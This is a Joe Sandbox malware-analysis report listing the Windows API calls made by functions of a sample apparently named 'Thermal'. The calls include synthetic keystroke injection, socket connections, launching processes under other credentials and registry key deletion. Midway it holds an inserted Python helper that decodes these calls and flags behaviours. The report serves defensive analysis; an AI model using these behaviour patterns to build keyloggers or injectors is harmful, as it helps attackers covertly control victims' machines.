                                                • Instruction ID: 01eee5dc44c8f22c097ac5d2e9d29f3b06dfb4d3598cc16d35a4b01777694ff9
                                                • Opcode Fuzzy Hash: 8d930f3f1e7ebc08627e312f83b6513c131ae58d58f5e37d719264d728baf731
                                                • Instruction Fuzzy Hash: 5E81C171108280EBC714EB25DC8AF6AB7E8EF89714F14851CF5559B2D2EB78DD01CBA2
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a9ed68bf357b021fd6aa1477029b92f1db550b56682a22e8d1788a4d28444578
                                                • Instruction ID: b7810d50231ee6a3a497255a6c06b8f448abfce2818169a24ccfb830368a627c
                                                • Opcode Fuzzy Hash: a9ed68bf357b021fd6aa1477029b92f1db550b56682a22e8d1788a4d28444578
                                                • Instruction Fuzzy Hash: CE714D30900209EFDF14CF58CC49AAEBB79FF86354F54C159F919AA251C738AA51CFA1
                                                APIs
                                                • IsWindow.USER32(00D85838), ref: 007FBA5D
                                                • IsWindowEnabled.USER32(00D85838), ref: 007FBA69
                                                • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 007FBB4D
                                                • SendMessageW.USER32(00D85838,000000B0,?,?), ref: 007FBB84
                                                • IsDlgButtonChecked.USER32(?,?), ref: 007FBBC1
                                                • GetWindowLongW.USER32(00D85838,000000EC), ref: 007FBBE3
                                                • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 007FBBFB
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                • String ID:
                                                • API String ID: 4072528602-0
                                                • Opcode ID: 2a87e75b8111d4cbd4052b361112d6cd71923e73de3e3e32c9467a32cadfce4d
                                                • Instruction ID: 9d16586557522b4c76ce05cdb2849b434e370735bad14a2d3c43c03c54fe353f
                                                • Opcode Fuzzy Hash: 2a87e75b8111d4cbd4052b361112d6cd71923e73de3e3e32c9467a32cadfce4d
                                                • Instruction Fuzzy Hash: 2471BB74604208EFDB259F64C894FBABBB9FF49300F148059EB55973A1CB3AAC50DB60
                                                APIs
                                                • _memset.LIBCMT ref: 007EFB31
                                                • _memset.LIBCMT ref: 007EFBFA
                                                • ShellExecuteExW.SHELL32(?), ref: 007EFC3F
                                                  • Part of subcall function 00774D37: __itow.LIBCMT ref: 00774D62
                                                  • Part of subcall function 00774D37: __swprintf.LIBCMT ref: 00774DAC
                                                  • Part of subcall function 0078436A: _wcscpy.LIBCMT ref: 0078438D
                                                • GetProcessId.KERNEL32(00000000), ref: 007EFCB6
                                                • CloseHandle.KERNEL32(00000000), ref: 007EFCE5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                • String ID: @
                                                • API String ID: 3522835683-2766056989
                                                • Opcode ID: 4f7efb11e20323b97ee875f75fa6250ddd053d9e56a40fffc7d615f4771648ab
                                                • Instruction ID: 06a7e01cdaf60fb48e4c9b1daa0b1623f4e17500bf871d460aceeaacc64aa3bd
                                                • Opcode Fuzzy Hash: 4f7efb11e20323b97ee875f75fa6250ddd053d9e56a40fffc7d615f4771648ab
                                                • Instruction Fuzzy Hash: 0A61CF74A00619DFCF14EFA5C4949AEB7F4FF48310F208469E84AAB761DB38AD41CB90
                                                APIs
                                                • GetParent.USER32(?), ref: 007D178B
                                                • GetKeyboardState.USER32(?), ref: 007D17A0
                                                • SetKeyboardState.USER32(?), ref: 007D1801
                                                • PostMessageW.USER32(?,00000101,00000010,?), ref: 007D182F
                                                • PostMessageW.USER32(?,00000101,00000011,?), ref: 007D184E
                                                • PostMessageW.USER32(?,00000101,00000012,?), ref: 007D1894
                                                • PostMessageW.USER32(?,00000101,0000005B,?), ref: 007D18B7
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: MessagePost$KeyboardState$Parent
                                                • String ID:
                                                • API String ID: 87235514-0
                                                • Opcode ID: 5b4598a9583a45f9e72876dd6cc976e97f4a6d0656ff9868b7d0675c16b1fdf7
                                                • Instruction ID: 10aeba9f3930c74aac90bc3280c5386607025231b06a7c17d7cc782e3d119de4
                                                • Opcode Fuzzy Hash: 5b4598a9583a45f9e72876dd6cc976e97f4a6d0656ff9868b7d0675c16b1fdf7
                                                • Instruction Fuzzy Hash: 4A51E6A0A087D53DFB368234CC55BBA7EF96B06310F4C858AE0D556AD2D29CECD4E750
                                                APIs
                                                • GetParent.USER32(00000000), ref: 007D15A4
                                                • GetKeyboardState.USER32(?), ref: 007D15B9
                                                • SetKeyboardState.USER32(?), ref: 007D161A
                                                • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 007D1646
                                                • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 007D1663
                                                • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 007D16A7
                                                • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 007D16C8
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: MessagePost$KeyboardState$Parent
                                                • String ID:
                                                • API String ID: 87235514-0
                                                • Opcode ID: ea1e52206ccfad14d78805792cf914220461a49275ddde805ebc18fe0435e1c5
                                                • Instruction ID: ed89db71611dc9ff5864626f7fbdb0926e2491b89b4d14172ccfdecd7455bd3d
                                                • Opcode Fuzzy Hash: ea1e52206ccfad14d78805792cf914220461a49275ddde805ebc18fe0435e1c5
                                                • Instruction Fuzzy Hash: 155117A06447D53DFB328724CC05BBA7EB96F46300F4C858AE0D546AC3DA9CEC98E750
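The two keystroke records above (functions at 007D178B and 007D15A4) and the Winsock receive loop at 007E72EB read much more clearly once the raw constants are decoded: message 0x100 is WM_KEYDOWN and 0x101 is WM_KEYUP, the wParam values 0x10, 0x11, 0x12 and 0x5B are VK_SHIFT, VK_CONTROL, VK_MENU and VK_LWIN, and `#17` in WSOCK32 is the ordinal import of recvfrom. The Python triage helper below is an added example, not part of the Joe Sandbox report or of the analysed sample. It parses "APIs" lines in the report's own line format, resolves those constants, and tags each function with a coarse behaviour indicator; the sample records are constructed by copying lines from the three entries above, and the indicator names and the rules behind them are the example's own assumptions, not Joe Sandbox signatures.

```python
import re

# Joe Sandbox prints each call as "• Name.MODULE(arg,...), ref: ADDR"; bare CRT
# calls ("_memmove.LIBCMT ref: ...") carry no argument list, and calls made by a
# callee are prefixed with "Part of subcall function XXXXXXXX:".
_CALL_RE = re.compile(
    r"•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>[^\s.(]+)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)"
)

# Export ordinals of WSOCK32.DLL (identical in WS2_32.DLL). The report prints
# "#17" when the sample imports a function by ordinal instead of by name.
WSOCK32_ORDINALS = {
    1: "accept", 2: "bind", 3: "closesocket", 4: "connect", 5: "getpeername",
    6: "getsockname", 7: "getsockopt", 8: "htonl", 9: "htons", 10: "inet_addr",
    11: "inet_ntoa", 12: "ioctlsocket", 13: "listen", 14: "ntohl", 15: "ntohs",
    16: "recv", 17: "recvfrom", 18: "select", 19: "send", 20: "sendto",
    21: "setsockopt", 22: "shutdown", 23: "socket",
}
WINDOW_MESSAGES = {0x100: "WM_KEYDOWN", 0x101: "WM_KEYUP", 0x30: "WM_SETFONT",
                   0xA1: "WM_NCLBUTTONDOWN", 0xB0: "EM_GETSEL"}
VIRTUAL_KEYS = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN"}

# Constructed sample: API lines copied from three records of the report.
SAMPLE_RECORDS = {
    "007E72EB": [
        "• __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 007E72EB",
        "• #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 007E730C",
        "• WSAGetLastError.WSOCK32(00000000), ref: 007E731F",
        "• inet_ntoa.WSOCK32(?), ref: 007E7392",
        "• _memmove.LIBCMT ref: 007E7498",
    ],
    "007D15A4": [
        "• GetParent.USER32(00000000), ref: 007D15A4",
        "• GetKeyboardState.USER32(?), ref: 007D15B9",
        "• SetKeyboardState.USER32(?), ref: 007D161A",
        "• PostMessageW.USER32(00000000,00000100,00000010,?), ref: 007D1646",
        "• PostMessageW.USER32(00000000,00000100,00000011,?), ref: 007D1663",
        "• PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 007D16C8",
    ],
    "007EFB31": [
        "• _memset.LIBCMT ref: 007EFB31",
        "• ShellExecuteExW.SHELL32(?), ref: 007EFC3F",
        "  • Part of subcall function 00774D37: __itow.LIBCMT ref: 00774D62",
        "• GetProcessId.KERNEL32(00000000), ref: 007EFCB6",
        "• CloseHandle.KERNEL32(00000000), ref: 007EFCE5",
    ],
}


def _hex(arg):
    """Argument value, or None for '?' (value not recovered by the sandbox)."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


def parse_api_line(line):
    """Parse one '• Name.MODULE(...)' line; returns None for non-API lines."""
    m = _CALL_RE.search(line)
    if not m:
        return None
    name = m.group("name")
    if name.startswith("#") and m.group("module") in ("WSOCK32", "WS2_32"):
        name = WSOCK32_ORDINALS.get(int(name[1:]), name)  # resolve ordinal import
    args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
    return {"name": name, "module": m.group("module"), "args": args,
            "ref": m.group("ref"), "subcall": m.group("sub") is not None}


def decode_call(call):
    """Render a call with window-message and virtual-key constants resolved."""
    if call["name"] in ("PostMessageW", "SendMessageW") and len(call["args"]) >= 3:
        msg = _hex(call["args"][1])
        msg_name = WINDOW_MESSAGES.get(msg, call["args"][1])
        wparam = call["args"][2]
        if msg in (0x100, 0x101):  # wParam of WM_KEYDOWN/WM_KEYUP is a VK code
            wparam = VIRTUAL_KEYS.get(_hex(wparam), wparam)
        return f"{call['name']}(hwnd={call['args'][0]}, {msg_name}, {wparam})"
    return f"{call['name']}({', '.join(call['args'])})"


def indicators(calls):
    """Coarse behaviour tags (example's own rules) for one function's direct calls."""
    names = {c["name"] for c in calls if not c["subcall"]}
    key_msgs = {_hex(c["args"][1]) for c in calls
                if c["name"] == "PostMessageW" and len(c["args"]) >= 2}
    found = set()
    # Rewriting the key-state array and posting modifier-key messages to
    # another window is keystroke injection, not ordinary UI code.
    if {"GetKeyboardState", "SetKeyboardState"} <= names and key_msgs & {0x100, 0x101}:
        found.add("keystroke_injection")
    if "recvfrom" in names and names & {"select", "__WSAFDIsSet"}:
        found.add("udp_receive_loop")
    if {"ShellExecuteExW", "GetProcessId"} <= names:
        found.add("spawn_and_track_child")
    return found


def analyze(records):
    """Map function address -> indicator set for a dict of API-line lists."""
    return {fn: indicators([c for c in map(parse_api_line, lines) if c])
            for fn, lines in records.items()}


if __name__ == "__main__":
    for fn, lines in SAMPLE_RECORDS.items():
        print(fn, sorted(analyze({fn: lines})[fn]))
        for call in filter(None, map(parse_api_line, lines)):
            print("   ", decode_call(call))
```

Pasting a whole report's "APIs" sections into `SAMPLE_RECORDS` (one list per function) is enough to get a decoded view of every record; lines that are not API calls, such as the "Snapshot File" or "Opcode ID" entries, are ignored by the parser.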
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: _wcsncpy$LocalTime
                                                • String ID:
                                                • API String ID: 2945705084-0
                                                • Opcode ID: c0f10438deca6fc2cd842b96706fc36df3dee9fe8f5192345bc501557834b886
                                                • Instruction ID: 47f579177196b83e7049db568dafdbd1fd097f7349d8ce4274e339b451a4b3c9
                                                • Opcode Fuzzy Hash: c0f10438deca6fc2cd842b96706fc36df3dee9fe8f5192345bc501557834b886
                                                • Instruction Fuzzy Hash: 71416076C20618B6CF11FBF4988E9CFB7B9AF04310F514856E519E3212E638A61687A6
                                                APIs
                                                  • Part of subcall function 007D4BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,007D3B8A,?), ref: 007D4BE0
                                                  • Part of subcall function 007D4BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,007D3B8A,?), ref: 007D4BF9
                                                • lstrcmpiW.KERNEL32(?,?), ref: 007D3BAA
                                                • _wcscmp.LIBCMT ref: 007D3BC6
                                                • MoveFileW.KERNEL32(?,?), ref: 007D3BDE
                                                • _wcscat.LIBCMT ref: 007D3C26
                                                • SHFileOperationW.SHELL32(?), ref: 007D3C92
                                                Strings
                                                Similarity
                                                • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                • String ID: \*.*
                                                • API String ID: 1377345388-1173974218
                                                APIs
                                                • _memset.LIBCMT ref: 007F78CF
                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007F7976
                                                • IsMenu.USER32(?), ref: 007F798E
                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 007F79D6
                                                • DrawMenuBar.USER32 ref: 007F79E9
                                                Strings
                                                Similarity
                                                • API ID: Menu$Item$DrawInfoInsert_memset
                                                • String ID: 0
                                                • API String ID: 3866635326-4108050209
                                                APIs
                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 007F1631
                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007F165B
                                                • FreeLibrary.KERNEL32(00000000), ref: 007F1712
                                                  • Part of subcall function 007F1602: RegCloseKey.ADVAPI32(?), ref: 007F1678
                                                  • Part of subcall function 007F1602: FreeLibrary.KERNEL32(?), ref: 007F16CA
                                                  • Part of subcall function 007F1602: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 007F16ED
                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 007F16B5
                                                Similarity
                                                • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                • String ID:
                                                • API String ID: 395352322-0
                                                APIs
                                                • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 007F6911
                                                • GetWindowLongW.USER32(00D85838,000000F0), ref: 007F6944
                                                • GetWindowLongW.USER32(00D85838,000000F0), ref: 007F6979
                                                • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 007F69AB
                                                • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 007F69D5
                                                • GetWindowLongW.USER32(?,000000F0), ref: 007F69E6
                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 007F6A00
                                                Similarity
                                                • API ID: LongWindow$MessageSend
                                                • String ID:
                                                • API String ID: 2178440468-0
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007CE2CA
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007CE2F0
                                                • SysAllocString.OLEAUT32(00000000), ref: 007CE2F3
                                                • SysAllocString.OLEAUT32(?), ref: 007CE311
                                                • SysFreeString.OLEAUT32(?), ref: 007CE31A
                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 007CE33F
                                                • SysAllocString.OLEAUT32(?), ref: 007CE34D
                                                Similarity
                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                • String ID:
                                                • API String ID: 3761583154-0
                                                APIs
                                                  • Part of subcall function 007E8475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 007E84A0
                                                • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 007E68B1
                                                • WSAGetLastError.WSOCK32(00000000), ref: 007E68C0
                                                • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 007E68F9
                                                • connect.WSOCK32(00000000,?,00000010), ref: 007E6902
                                                • WSAGetLastError.WSOCK32 ref: 007E690C
                                                • closesocket.WSOCK32(00000000), ref: 007E6935
                                                • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 007E694E
                                                Similarity
                                                • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                • String ID:
                                                • API String ID: 910771015-0
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007CE3A5
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007CE3CB
                                                • SysAllocString.OLEAUT32(00000000), ref: 007CE3CE
                                                • SysAllocString.OLEAUT32 ref: 007CE3EF
                                                • SysFreeString.OLEAUT32 ref: 007CE3F8
                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 007CE412
                                                • SysAllocString.OLEAUT32(?), ref: 007CE420
                                                Similarity
                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                • String ID:
                                                • API String ID: 3761583154-0
                                                APIs
                                                  • Part of subcall function 00772111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0077214F
                                                  • Part of subcall function 00772111: GetStockObject.GDI32(00000011), ref: 00772163
                                                  • Part of subcall function 00772111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0077216D
                                                • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 007F7C57
                                                • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 007F7C64
                                                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 007F7C6F
                                                • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 007F7C7E
                                                • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 007F7C8A
                                                Strings
                                                Similarity
                                                • API ID: MessageSend$CreateObjectStockWindow
                                                • String ID: Msctls_Progress32
                                                • API String ID: 1025951953-3636473452
                                                APIs
                                                • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00794282,?), ref: 007941D3
                                                • GetProcAddress.KERNEL32(00000000), ref: 007941DA
                                                • EncodePointer.KERNEL32(00000000), ref: 007941E6
                                                • DecodePointer.KERNEL32(00000001,00794282,?), ref: 00794203
                                                Strings
                                                Similarity
                                                • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                • String ID: RoInitialize$combase.dll
                                                • API String ID: 3489934621-340411864
                                                APIs
                                                • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,007941A8), ref: 007942A8
                                                • GetProcAddress.KERNEL32(00000000), ref: 007942AF
                                                • EncodePointer.KERNEL32(00000000), ref: 007942BA
                                                • DecodePointer.KERNEL32(007941A8), ref: 007942D5
                                                Strings
                                                Similarity
                                                • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                • String ID: RoUninitialize$combase.dll
                                                • API String ID: 3489934621-2819208100
                                                APIs
                                                • GetClientRect.USER32(?,?), ref: 007721B8
                                                • GetWindowRect.USER32(?,?), ref: 007721F9
                                                • ScreenToClient.USER32(?,?), ref: 00772221
                                                • GetClientRect.USER32(?,?), ref: 00772350
                                                • GetWindowRect.USER32(?,?), ref: 00772369
                                                Similarity
                                                • API ID: Rect$Client$Window$Screen
                                                • String ID:
                                                • API String ID: 1296646539-0
                                                APIs
                                                Similarity
                                                • API ID: _memmove$__itow__swprintf
                                                • String ID:
                                                • API String ID: 3253778849-0
                                                APIs
                                                  • Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77
                                                  • Part of subcall function 007F147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007F040D,?,?), ref: 007F1491
                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007F091D
                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007F095D
                                                • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 007F0980
                                                • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 007F09A9
                                                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 007F09EC
                                                • RegCloseKey.ADVAPI32(00000000), ref: 007F09F9
                                                Similarity
                                                • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                • String ID:
                                                • API String ID: 4046560759-0
                                                APIs
                                                • VariantInit.OLEAUT32(?), ref: 007CF6A2
                                                • VariantClear.OLEAUT32(00000013), ref: 007CF714
                                                • VariantClear.OLEAUT32(00000000), ref: 007CF76F
                                                • _memmove.LIBCMT ref: 007CF799
                                                • VariantClear.OLEAUT32(?), ref: 007CF7E6
                                                • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 007CF814
                                                Similarity
                                                • API ID: Variant$Clear$ChangeInitType_memmove
                                                • String ID:
                                                • API String ID: 1101466143-0
                                                APIs
                                                • _memset.LIBCMT ref: 007D29FF
                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007D2A4A
                                                • IsMenu.USER32(00000000), ref: 007D2A6A
                                                • CreatePopupMenu.USER32 ref: 007D2A9E
                                                • GetMenuItemCount.USER32(000000FF), ref: 007D2AFC
                                                • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 007D2B2D
                                                Similarity
                                                • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                • String ID:
                                                • API String ID: 3311875123-0
                                                APIs
                                                  • Part of subcall function 007729E2: GetWindowLongW.USER32(?,000000EB), ref: 007729F3
                                                • BeginPaint.USER32(?,?,?,?,?,?), ref: 00771B76
                                                • GetWindowRect.USER32(?,?), ref: 00771BDA
                                                • ScreenToClient.USER32(?,?), ref: 00771BF7
                                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00771C08
                                                • EndPaint.USER32(?,?), ref: 00771C52
                                                Similarity
                                                • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                • String ID:
                                                • API String ID: 1827037458-0
                                                APIs
                                                • GetForegroundWindow.USER32(?,?,?,?,?,?,007E550C,?,?,00000000,00000001), ref: 007E7796
                                                  • Part of subcall function 007E406C: GetWindowRect.USER32(?,?), ref: 007E407F
                                                • GetDesktopWindow.USER32 ref: 007E77C0
                                                • GetWindowRect.USER32(00000000), ref: 007E77C7
                                                • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 007E77F9
                                                  • Part of subcall function 007D57FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007D5877
                                                • GetCursorPos.USER32(?), ref: 007E7825
                                                • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 007E7883
                                                Similarity
                                                • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                • String ID:
                                                • API String ID: 4137160315-0
                                                APIs
                                                  • Part of subcall function 007C8CC7: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 007C8CDE
                                                  • Part of subcall function 007C8CC7: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 007C8CE8
                                                  • Part of subcall function 007C8CC7: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 007C8CF7
                                                  • Part of subcall function 007C8CC7: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 007C8CFE
                                                  • Part of subcall function 007C8CC7: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 007C8D14
                                                • GetLengthSid.ADVAPI32(?,00000000,007C904D), ref: 007C9482
                                                • GetProcessHeap.KERNEL32(00000008,00000000), ref: 007C948E
                                                • HeapAlloc.KERNEL32(00000000), ref: 007C9495
                                                • CopySid.ADVAPI32(00000000,00000000,?), ref: 007C94AE
                                                • GetProcessHeap.KERNEL32(00000000,00000000,007C904D), ref: 007C94C2
                                                • HeapFree.KERNEL32(00000000), ref: 007C94C9
                                                Similarity
                                                • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                • String ID:
                                                • API String ID: 3008561057-0
                                                APIs
                                                • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 007C9200
                                                • OpenProcessToken.ADVAPI32(00000000), ref: 007C9207
                                                • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 007C9216
                                                • CloseHandle.KERNEL32(00000004), ref: 007C9221
                                                • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 007C9250
                                                • DestroyEnvironmentBlock.USERENV(00000000), ref: 007C9264
                                                Similarity
                                                • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                • String ID:
                                                • API String ID: 1413079979-0
                                                APIs
                                                • GetDC.USER32(00000000), ref: 007CC34E
                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 007CC35F
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007CC366
                                                • ReleaseDC.USER32(00000000,00000000), ref: 007CC36E
                                                • MulDiv.KERNEL32(000009EC,?,00000000), ref: 007CC385
                                                • MulDiv.KERNEL32(000009EC,?,?), ref: 007CC397
                                                Similarity
                                                • API ID: CapsDevice$Release
                                                • String ID:
                                                • API String ID: 1035833867-0
                                                APIs
                                                  • Part of subcall function 007716CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00771729
                                                  • Part of subcall function 007716CF: SelectObject.GDI32(?,00000000), ref: 00771738
                                                  • Part of subcall function 007716CF: BeginPath.GDI32(?), ref: 0077174F
                                                  • Part of subcall function 007716CF: SelectObject.GDI32(?,00000000), ref: 00771778
                                                • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 007FC57C
